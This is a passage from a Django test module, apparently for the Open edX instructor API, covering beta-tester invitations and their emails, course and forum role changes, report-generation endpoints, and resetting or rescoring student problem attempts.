assert response.status_code == 200
assert CourseBetaTesterRole(self.course.id).has_user(self.notenrolled_student)
# test the response data
expected = {
"action": "add",
"results": [
{
"identifier": self.notenrolled_student.email,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to a beta test for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
student_name = self.notenrolled_student.profile.name
assert text_body.startswith(f'Dear {student_name}')
assert f'Visit {self.course.display_name}' in html_body
for body in [text_body, html_body]:
assert 'You have been invited to be a beta tester for {display_name} at edx.org'.format(
display_name=self.course.display_name,
) in body
assert 'by a member of the course staff.' in body
assert 'enroll in this course and begin the beta test' in body
assert '{proto}://{site}{about_path}'.format(
proto=protocol,
site=self.site_name,
about_path=self.about_path,
) in body
assert 'This email was automatically sent from edx.org to {student_email}'.format(
student_email=self.notenrolled_student.email,
) in body
@ddt.data('http', 'https')
def test_add_notenrolled_with_email_autoenroll(self, protocol):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
params = {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': True,
'auto_enroll': True}
environ = {'wsgi.url_scheme': protocol}
response = self.client.post(url, params, **environ)
assert response.status_code == 200
assert CourseBetaTesterRole(self.course.id).has_user(self.notenrolled_student)
# test the response data
expected = {
"action": "add",
"results": [
{
"identifier": self.notenrolled_student.email,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been invited to a beta test for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
student_name = self.notenrolled_student.profile.name
assert text_body.startswith(f'Dear {student_name}')
for body in [text_body, html_body]:
assert 'You have been invited to be a beta tester for {display_name} at edx.org'.format(
display_name=self.course.display_name,
) in body
assert 'by a member of the course staff' in body
assert 'To start accessing course materials, please visit' in body
assert '{proto}://{site}{course_path}'.format(
proto=protocol,
site=self.site_name,
course_path=self.course_path
)
assert 'This email was automatically sent from edx.org to {student_email}'.format(
student_email=self.notenrolled_student.email,
) in body
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_add_notenrolled_email_mktgsite(self):
# Try with marketing site enabled
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {'identifiers': self.notenrolled_student.email, 'action': 'add', 'email_students': True}) # lint-amnesty, pylint: disable=line-too-long
assert response.status_code == 200
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
student_name = self.notenrolled_student.profile.name
assert text_body.startswith(f'Dear {student_name}')
for body in [text_body, html_body]:
assert 'You have been invited to be a beta tester for {display_name} at edx.org'.format(
display_name=self.course.display_name,
) in body
assert 'by a member of the course staff.' in body
assert 'Visit edx.org' in body
assert 'enroll in this course and begin the beta test' in body
assert 'This email was automatically sent from edx.org to {student_email}'.format(
student_email=self.notenrolled_student.email,
) in body
def test_enroll_with_email_not_registered(self):
# User doesn't exist
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': self.notregistered_email, 'action': 'add', 'email_students': True,
'reason': 'testing'})
assert response.status_code == 200
# test the response data
expected = {
"action": "add",
"results": [
{
"identifier": self.notregistered_email,
"error": True,
"userDoesNotExist": True,
"is_active": None
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
def test_remove_without_email(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': self.beta_tester.email, 'action': 'remove', 'email_students': False,
'reason': 'testing'})
assert response.status_code == 200
# Works around a caching bug which supposedly can't happen in prod. The instance here is not ==
# the instance fetched from the email above which had its cache cleared
if hasattr(self.beta_tester, '_roles'):
del self.beta_tester._roles
assert not CourseBetaTesterRole(self.course.id).has_user(self.beta_tester)
# test the response data
expected = {
"action": "remove",
"results": [
{
"identifier": self.beta_tester.email,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 0
def test_remove_with_email(self):
url = reverse('bulk_beta_modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url,
{'identifiers': self.beta_tester.email, 'action': 'remove', 'email_students': True,
'reason': 'testing'})
assert response.status_code == 200
# Works around a caching bug which supposedly can't happen in prod. The instance here is not ==
# the instance fetched from the email above which had its cache cleared
if hasattr(self.beta_tester, '_roles'):
del self.beta_tester._roles
assert not CourseBetaTesterRole(self.course.id).has_user(self.beta_tester)
# test the response data
expected = {
"action": "remove",
"results": [
{
"identifier": self.beta_tester.email,
"error": False,
"userDoesNotExist": False,
"is_active": True
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
# Check the outbox
assert len(mail.outbox) == 1
assert mail.outbox[0].subject == f'You have been removed from a beta test for {self.course.display_name}'
text_body = mail.outbox[0].body
html_body = mail.outbox[0].alternatives[0][0]
assert text_body.startswith(f'Dear {self.beta_tester.profile.name}')
for body in [text_body, html_body]:
assert 'You have been removed as a beta tester for {display_name} at edx.org'.format(
display_name=self.course.display_name,
) in body
assert ('This course will remain on your dashboard, but you will no longer be '
'part of the beta testing group.') in body
assert 'Your other courses have not been affected.' in body
assert 'This email was automatically sent from edx.org to {email_address}'.format(
email_address=self.beta_tester.email,
) in body
class TestInstructorAPILevelsAccess(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can change permissions
of other users.
This test does NOT test whether the actions had an effect on the
database, that is the job of test_access.
This tests the response and action switch.
Actually, modify_access does not have a very meaningful
response yet, so only the status code is tested.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.other_instructor = InstructorFactory(course_key=self.course.id)
self.other_staff = StaffFactory(course_key=self.course.id)
self.other_user = UserFactory()
def test_modify_access_noparams(self):
""" Test missing all query parameters. """
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_modify_access_bad_action(self):
""" Test with an invalid action parameter. """
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.email,
'rolename': 'staff',
'action': 'robot-not-an-action',
})
assert response.status_code == 400
def test_modify_access_bad_role(self):
""" Test with an invalid action parameter. """
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.email,
'rolename': 'robot-not-a-roll',
'action': 'revoke',
})
assert response.status_code == 400
def test_modify_access_allow(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_user.email,
'rolename': 'staff',
'action': 'allow',
})
assert response.status_code == 200
def test_modify_access_allow_with_uname(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_instructor.username,
'rolename': 'staff',
'action': 'allow',
})
assert response.status_code == 200
def test_modify_access_revoke(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.email,
'rolename': 'staff',
'action': 'revoke',
})
assert response.status_code == 200
def test_modify_access_revoke_with_username(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.username,
'rolename': 'staff',
'action': 'revoke',
})
assert response.status_code == 200
def test_modify_access_with_fake_user(self):
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': 'GandalfTheGrey',
'rolename': 'staff',
'action': 'revoke',
})
assert response.status_code == 200
expected = {
'unique_student_identifier': 'GandalfTheGrey',
'userDoesNotExist': True,
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_modify_access_with_inactive_user(self):
self.other_user.is_active = False
self.other_user.save()
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_user.username,
'rolename': 'beta',
'action': 'allow',
})
assert response.status_code == 200
expected = {
'unique_student_identifier': self.other_user.username,
'inactiveUser': True,
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_modify_access_revoke_not_allowed(self):
""" Test revoking access that a user does not have. """
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.other_staff.email,
'rolename': 'instructor',
'action': 'revoke',
})
assert response.status_code == 200
def test_modify_access_revoke_self(self):
"""
Test that an instructor cannot remove instructor privelages from themself.
"""
url = reverse('modify_access', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.instructor.email,
'rolename': 'instructor',
'action': 'revoke',
})
assert response.status_code == 200
# check response content
expected = {
'unique_student_identifier': self.instructor.username,
'rolename': 'instructor',
'action': 'revoke',
'removingSelfAsInstructor': True,
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_list_course_role_members_noparams(self):
""" Test missing all query parameters. """
url = reverse('list_course_role_members', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_list_course_role_members_bad_rolename(self):
""" Test with an invalid rolename parameter. """
url = reverse('list_course_role_members', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'rolename': 'robot-not-a-rolename',
})
assert response.status_code == 400
def test_list_course_role_members_staff(self):
url = reverse('list_course_role_members', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'rolename': 'staff',
})
assert response.status_code == 200
# check response content
expected = {
'course_id': str(self.course.id),
'staff': [
{
'username': self.other_staff.username,
'email': self.other_staff.email,
'first_name': self.other_staff.first_name,
'last_name': self.other_staff.last_name,
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_list_course_role_members_beta(self):
url = reverse('list_course_role_members', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'rolename': 'beta',
})
assert response.status_code == 200
# check response content
expected = {
'course_id': str(self.course.id),
'beta': []
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected
def test_update_forum_role_membership(self):
"""
Test update forum role membership with user's email and username.
"""
# Seed forum roles for course.
seed_permissions_roles(self.course.id)
for user in [self.instructor, self.other_user]:
for identifier_attr in [user.email, user.username]:
for rolename in ["Administrator", "Moderator", "Community TA"]:
for action in ["allow", "revoke"]:
self.assert_update_forum_role_membership(user, identifier_attr, rolename, action)
def assert_update_forum_role_membership(self, current_user, identifier, rolename, action):
"""
Test update forum role membership.
Get unique_student_identifier, rolename and action and update forum role.
"""
url = reverse('update_forum_role_membership', kwargs={'course_id': str(self.course.id)})
response = self.client.post(
url,
{
'unique_student_identifier': identifier,
'rolename': rolename,
'action': action,
}
)
# Status code should be 200.
assert response.status_code == 200
user_roles = current_user.roles.filter(course_id=self.course.id).values_list("name", flat=True)
if action == 'allow':
assert rolename in user_roles
elif action == 'revoke':
assert rolename not in user_roles
@ddt.ddt
class TestInstructorAPILevelsDataDump(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints that show data without side effects.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
def setUp(self):
super().setUp()
self.course_mode = CourseMode(course_id=self.course.id,
mode_slug="honor",
mode_display_name="honor cert",
min_price=40)
self.course_mode.save()
self.instructor = InstructorFactory(course_key=self.course.id)
CourseDataResearcherRole(self.course.id).add_users(self.instructor)
self.client.login(username=self.instructor.username, password='test')
self.students = [UserFactory() for _ in range(6)]
for student in self.students:
CourseEnrollment.enroll(student, self.course.id)
self.students_who_may_enroll = self.students + [UserFactory() for _ in range(5)]
for student in self.students_who_may_enroll:
CourseEnrollmentAllowed.objects.create(
email=student.email, course_id=self.course.id
)
def test_get_problem_responses_invalid_location(self):
"""
Test whether get_problem_responses returns an appropriate status
message when users submit an invalid problem location.
"""
url = reverse(
'get_problem_responses',
kwargs={'course_id': str(self.course.id)}
)
problem_location = ''
response = self.client.post(url, {'problem_location': problem_location})
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == 'Could not find problem with this location.'
def valid_problem_location(test): # pylint: disable=no-self-argument
"""
Decorator for tests that target get_problem_responses endpoint and
need to pretend user submitted a valid problem location.
"""
@functools.wraps(test)
def wrapper(self, *args, **kwargs):
"""
Run `test` method, ensuring that UsageKey.from_string returns a
problem key that the get_problem_responses endpoint can
work with.
"""
mock_problem_key = NonCallableMock(return_value='')
mock_problem_key.course_key = self.course.id
with patch.object(UsageKey, 'from_string') as patched_method:
patched_method.return_value = mock_problem_key
test(self, *args, **kwargs)
return wrapper
@valid_problem_location
def test_get_problem_responses_successful(self):
"""
Test whether get_problem_responses returns an appropriate status
message if CSV generation was started successfully.
"""
url = reverse(
'get_problem_responses',
kwargs={'course_id': str(self.course.id)}
)
problem_location = ''
response = self.client.post(url, {'problem_location': problem_location})
res_json = json.loads(response.content.decode('utf-8'))
assert 'status' in res_json
status = res_json['status']
assert 'is being created' in status
assert 'already in progress' not in status
assert 'task_id' in res_json
@valid_problem_location
def test_get_problem_responses_already_running(self):
"""
Test whether get_problem_responses returns an appropriate status
message if CSV generation is already in progress.
"""
url = reverse(
'get_problem_responses',
kwargs={'course_id': str(self.course.id)}
)
task_type = 'problem_responses_csv'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_calculate_problem_responses_csv') as submit_task_function:
error = AlreadyRunningError(already_running_status)
submit_task_function.side_effect = error
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_students_features(self):
"""
Test that some minimum of information is formatted
correctly in the response to get_students_features.
"""
for student in self.students:
student.profile.city = f"Mos Eisley {student.id}"
student.profile.save()
url = reverse('get_students_features', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
res_json = json.loads(response.content.decode('utf-8'))
assert 'students' in res_json
for student in self.students:
student_json = [
x for x in res_json['students']
if x['username'] == student.username
][0]
assert student_json['username'] == student.username
assert student_json['email'] == student.email
assert student_json['city'] == student.profile.city
assert student_json['country'] == ''
@ddt.data(True, False)
def test_get_students_features_cohorted(self, is_cohorted):
"""
Test that get_students_features includes cohort info when the course is
cohorted, and does not when the course is not cohorted.
"""
url = reverse('get_students_features', kwargs={'course_id': str(self.course.id)})
set_course_cohorted(self.course.id, is_cohorted)
response = self.client.post(url, {})
res_json = json.loads(response.content.decode('utf-8'))
assert ('cohort' in res_json['feature_names']) == is_cohorted
@ddt.data(True, False)
def test_get_students_features_teams(self, has_teams):
"""
Test that get_students_features includes team info when the course is
has teams enabled, and does not when the course does not have teams enabled
"""
if has_teams:
self.course = CourseFactory.create(teams_configuration=TeamsConfig({
'max_size': 2, 'topics': [{'id': 'topic', 'name': 'Topic', 'description': 'A Topic'}]
}))
course_instructor = InstructorFactory(course_key=self.course.id)
CourseDataResearcherRole(self.course.id).add_users(course_instructor)
self.client.login(username=course_instructor.username, password='test')
url = reverse('get_students_features', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
res_json = json.loads(response.content.decode('utf-8'))
assert ('team' in res_json['feature_names']) == has_teams
@ddt.data(True, False)
def test_get_students_features_external_user_key(self, has_program_enrollments):
external_key_dict = {}
if has_program_enrollments:
for i in range(len(self.students)):
student = self.students[i]
external_key = "{}_{}".format(student.username, i)
ProgramEnrollmentFactory.create(user=student, external_user_key=external_key)
external_key_dict[student.username] = external_key
url = reverse('get_students_features', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {})
res_json = json.loads(response.content.decode('utf-8'))
assert 'external_user_key' in res_json['feature_names']
for student in self.students:
student_json = [
x for x in res_json['students']
if x['username'] == student.username
][0]
assert student_json['username'] == student.username
if has_program_enrollments:
assert student_json['external_user_key'] == external_key_dict[student.username]
else:
assert student_json['external_user_key'] == ''
def test_get_students_who_may_enroll(self):
"""
Test whether get_students_who_may_enroll returns an appropriate
status message when users request a CSV file of students who
may enroll in a course.
"""
url = reverse(
'get_students_who_may_enroll',
kwargs={'course_id': str(self.course.id)}
)
# Successful case:
response = self.client.post(url, {})
assert response.status_code == 200
# CSV generation already in progress:
task_type = 'may_enroll_info_csv'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_calculate_may_enroll_csv') as submit_task_function:
error = AlreadyRunningError(already_running_status)
submit_task_function.side_effect = error
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_student_exam_results(self):
"""
Test whether get_proctored_exam_results returns an appropriate
status message when users request a CSV file.
"""
url = reverse(
'get_proctored_exam_results',
kwargs={'course_id': str(self.course.id)}
)
# Successful case:
response = self.client.post(url, {})
assert response.status_code == 200
# CSV generation already in progress:
task_type = 'proctored_exam_results_report'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_proctored_exam_results_report') as submit_task_function:
error = AlreadyRunningError(already_running_status)
submit_task_function.side_effect = error
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_access_course_finance_admin_with_invalid_course_key(self):
"""
Test assert require_course fiance_admin before generating
a detailed enrollment report
"""
func = Mock()
decorated_func = require_finance_admin(func)
request = self.mock_request()
response = decorated_func(request, 'invalid_course_key')
assert response.status_code == 404
assert not func.called
def mock_request(self):
"""
mock request
"""
request = Mock()
request.user = self.instructor
return request
def test_access_course_finance_admin_with_valid_course_key(self):
"""
Test to check the course_finance_admin role with valid key
but doesn't have access to the function
"""
func = Mock()
decorated_func = require_finance_admin(func)
request = self.mock_request()
response = decorated_func(request, 'valid/course/key')
assert response.status_code == 403
assert not func.called
def test_add_user_to_fiance_admin_role_with_valid_course(self):
"""
test to check that a function is called using a fiance_admin
rights.
"""
func = Mock()
decorated_func = require_finance_admin(func)
request = self.mock_request()
CourseFinanceAdminRole(self.course.id).add_users(self.instructor)
decorated_func(request, str(self.course.id))
assert func.called
@patch('lms.djangoapps.instructor_task.models.logger.error')
@patch.dict(settings.GRADES_DOWNLOAD, {'STORAGE_TYPE': 's3', 'ROOT_PATH': 'tmp/edx-s3/grades'})
def test_list_report_downloads_error(self, mock_error):
"""
Tests the Rate-Limit exceeded is handled and does not raise 500 error.
"""
ex_status = 503
ex_reason = 'Slow Down'
url = reverse('list_report_downloads', kwargs={'course_id': str(self.course.id)})
with patch('storages.backends.s3boto.S3BotoStorage.listdir', side_effect=BotoServerError(ex_status, ex_reason)):
response = self.client.post(url, {})
mock_error.assert_called_with(
'Fetching files failed for course: %s, status: %s, reason: %s',
self.course.id,
ex_status,
ex_reason,
)
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == {'downloads': []}
def test_list_report_downloads(self):
url = reverse('list_report_downloads', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor_task.models.DjangoStorageReportStore.links_for') as mock_links_for:
mock_links_for.return_value = [
('mock_file_name_1', 'https://1.mock.url'),
('mock_file_name_2', 'https://2.mock.url'),
]
response = self.client.post(url, {})
expected_response = {
"downloads": [
{
"url": "https://1.mock.url",
"link": "<a href=\"https://1.mock.url\">mock_file_name_1</a>",
"name": "mock_file_name_1"
},
{
"url": "https://2.mock.url",
"link": "<a href=\"https://2.mock.url\">mock_file_name_2</a>",
"name": "mock_file_name_2"
}
]
}
res_json = json.loads(response.content.decode('utf-8'))
assert res_json == expected_response
@ddt.data(*REPORTS_DATA)
@ddt.unpack
@valid_problem_location
def test_calculate_report_csv_success(
self, report_type, instructor_api_endpoint, task_api_endpoint, extra_instructor_api_kwargs
):
kwargs = {'course_id': str(self.course.id)}
kwargs.update(extra_instructor_api_kwargs)
url = reverse(instructor_api_endpoint, kwargs=kwargs)
success_status = f"The {report_type} report is being created."
with patch(task_api_endpoint) as mock_task_api_endpoint:
if report_type == 'problem responses':
mock_task_api_endpoint.return_value = Mock(task_id='task-id-1138')
response = self.client.post(url, {'problem_location': ''})
self.assertContains(response, success_status)
else:
CourseFinanceAdminRole(self.course.id).add_users(self.instructor)
response = self.client.post(url, {})
self.assertContains(response, success_status)
def test_get_ora2_responses_success(self):
url = reverse('export_ora2_data', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_data') as mock_submit_ora2_task:
mock_submit_ora2_task.return_value = True
response = self.client.post(url, {})
success_status = "The ORA data report is being created."
self.assertContains(response, success_status)
def test_get_ora2_responses_already_running(self):
url = reverse('export_ora2_data', kwargs={'course_id': str(self.course.id)})
task_type = 'export_ora2_data'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_data') as mock_submit_ora2_task:
mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status)
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_ora2_submission_files_success(self):
url = reverse('export_ora2_submission_files', kwargs={'course_id': str(self.course.id)})
with patch(
'lms.djangoapps.instructor_task.api.submit_export_ora2_submission_files'
) as mock_submit_ora2_task:
mock_submit_ora2_task.return_value = True
response = self.client.post(url, {})
success_status = 'Attachments archive is being created.'
self.assertContains(response, success_status)
def test_get_ora2_submission_files_already_running(self):
url = reverse('export_ora2_submission_files', kwargs={'course_id': str(self.course.id)})
task_type = 'export_ora2_submission_files'
already_running_status = generate_already_running_error_message(task_type)
with patch(
'lms.djangoapps.instructor_task.api.submit_export_ora2_submission_files'
) as mock_submit_ora2_task:
mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status)
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_ora2_summary_responses_success(self):
url = reverse('export_ora2_summary', kwargs={'course_id': str(self.course.id)})
with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_summary') as mock_submit_ora2_task:
mock_submit_ora2_task.return_value = True
response = self.client.post(url, {})
success_status = "The ORA summary report is being created."
self.assertContains(response, success_status)
def test_get_ora2_summary_responses_already_running(self):
url = reverse('export_ora2_summary', kwargs={'course_id': str(self.course.id)})
task_type = 'export_ora2_summary'
already_running_status = generate_already_running_error_message(task_type)
with patch('lms.djangoapps.instructor_task.api.submit_export_ora2_summary') as mock_submit_ora2_task:
mock_submit_ora2_task.side_effect = AlreadyRunningError(already_running_status)
response = self.client.post(url, {})
self.assertContains(response, already_running_status, status_code=400)
def test_get_student_progress_url(self):
""" Test that progress_url is in the successful response. """
url = reverse('get_student_progress_url', kwargs={'course_id': str(self.course.id)})
data = {'unique_student_identifier': self.students[0].email}
response = self.client.post(url, data)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert 'progress_url' in res_json
def test_get_student_progress_url_from_uname(self):
""" Test that progress_url is in the successful response. """
url = reverse('get_student_progress_url', kwargs={'course_id': str(self.course.id)})
data = {'unique_student_identifier': self.students[0].username}
response = self.client.post(url, data)
assert response.status_code == 200
res_json = json.loads(response.content.decode('utf-8'))
assert 'progress_url' in res_json
def test_get_student_progress_url_noparams(self):
""" Test that the endpoint 404's without the required query params. """
url = reverse('get_student_progress_url', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
def test_get_student_progress_url_nostudent(self):
""" Test that the endpoint 400's when requesting an unknown email. """
url = reverse('get_student_progress_url', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url)
assert response.status_code == 400
class TestInstructorAPIRegradeTask(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can change student grades.
This includes resetting attempts and starting rescore tasks.
This test does NOT test whether the actions had an effect on the
database, that is the job of task tests and test_enrollment.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create()
cls.problem_location = msk_from_problem_urlname(
cls.course.id,
'robot-some-problem-urlname'
)
cls.problem_urlname = str(cls.problem_location)
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
CourseEnrollment.enroll(self.student, self.course.id)
self.module_to_reset = StudentModule.objects.create(
student=self.student,
course_id=self.course.id,
module_state_key=self.problem_location,
state=json.dumps({'attempts': 10}),
)
def test_reset_student_attempts_deletall(self):
""" Make sure no one can delete all students state on a problem. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
'delete_module': True,
})
assert response.status_code == 400
def test_reset_student_attempts_single(self):
""" Test reset single student attempts. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
# make sure problem attempts have been reset.
changed_module = StudentModule.objects.get(pk=self.module_to_reset.pk)
assert json.loads(changed_module.state)['attempts'] == 0
# mock out the function which should be called to execute the action.
@patch('lms.djangoapps.instructor_task.api.submit_reset_problem_attempts_for_all_students')
def test_reset_student_attempts_all(self, act):
""" Test reset all student attempts. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
})
assert response.status_code == 200
assert act.called
def test_reset_student_attempts_missingmodule(self):
""" Test reset for non-existant problem. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': 'robot-not-a-real-module',
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
@patch('lms.djangoapps.grades.signals.handlers.PROBLEM_WEIGHTED_SCORE_CHANGED.send')
def test_reset_student_attempts_delete(self, _mock_signal):
""" Test delete single student state. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.email,
'delete_module': True,
})
assert response.status_code == 200
# make sure the module has been deleted
assert StudentModule.objects\
.filter(student=self.module_to_reset.student, course_id=self.module_to_reset.course_id).count() == 0
def test_reset_student_attempts_nonsense(self):
""" Test failure with both unique_student_identifier and all_students. """
url = reverse('reset_student_attempts', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.email,
'all_students': True,
})
assert response.status_code == 400
@patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_student')
def test_rescore_problem_single(self, act):
""" Test rescoring of a single student. """
url = reverse('rescore_problem', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.email,
})
assert response.status_code == 200
assert act.called
@patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_student')
def test_rescore_problem_single_from_uname(self, act):
""" Test rescoring of a single student. """
url = reverse('rescore_problem', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'unique_student_identifier': self.student.username,
})
assert response.status_code == 200
assert act.called
@patch('lms.djangoapps.instructor_task.api.submit_rescore_problem_for_all_students')
def test_rescore_problem_all(self, act):
""" Test rescoring for all students. """
url = reverse('rescore_problem', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'problem_to_reset': self.problem_urlname,
'all_students': True,
})
assert response.status_code == 200
assert act.called
@patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True})
def test_course_has_entrance_exam_in_student_attempts_reset(self):
""" Test course has entrance exam id set while resetting attempts"""
url = reverse('reset_student_attempts_for_entrance_exam',
kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'all_students': True,
'delete_module': False,
})
assert response.status_code == 400
@patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True})
def test_rescore_entrance_exam_with_invalid_exam(self):
""" Test course has entrance exam id set while re-scoring. """
url = reverse('rescore_entrance_exam', kwargs={'course_id': str(self.course.id)})
response = self.client.post(url, {
'unique_student_identifier': self.student.email,
})
assert response.status_code == 400
@patch.dict(settings.FEATURES, {'ENTRANCE_EXAMS': True})
@ddt.ddt
class TestEntranceExamInstructorAPIRegradeTask(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
"""
Test endpoints whereby instructors can rescore student grades,
reset student attempts and delete state for entrance exam.
"""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.course = CourseFactory.create(
org='test_org',
course='test_course',
run='test_run',
entrance_exam_id='i4x://{}/{}/chapter/Entrance_exam'.format('test_org', 'test_course')
)
cls.course_with_invalid_ee = CourseFactory.create(entrance_exam_id='invalid_exam')
with cls.store.bulk_operations(cls.course.id, emit_signals=False):
cls.entrance_exam = ItemFactory.create(
parent=cls.course,
category='chapter',
display_name='Entrance exam'
)
subsection = ItemFactory.create(
parent=cls.entrance_exam,
category='sequential',
display_name='Subsection 1'
)
vertical = ItemFactory.create(
parent=subsection,
category='vertical',
display_name='Vertical 1'
)
cls.ee_problem_1 = ItemFactory.create(
parent=vertical,
category="problem",
display_name="Exam Problem - Problem 1"
)
cls.ee_problem_2 = ItemFactory.create(
parent=vertical,
category="problem",
display_name="Exam Problem - Problem 2"
)
def setUp(self):
super().setUp()
self.instructor = InstructorFactory(course_key=self.course.id)
# Add instructor to invalid ee course
CourseInstructorRole(self.course_with_invalid_ee.id).add_users(self.instructor)
self.client.login(username=self.instructor.username, password='test')
self.student = UserFactory()
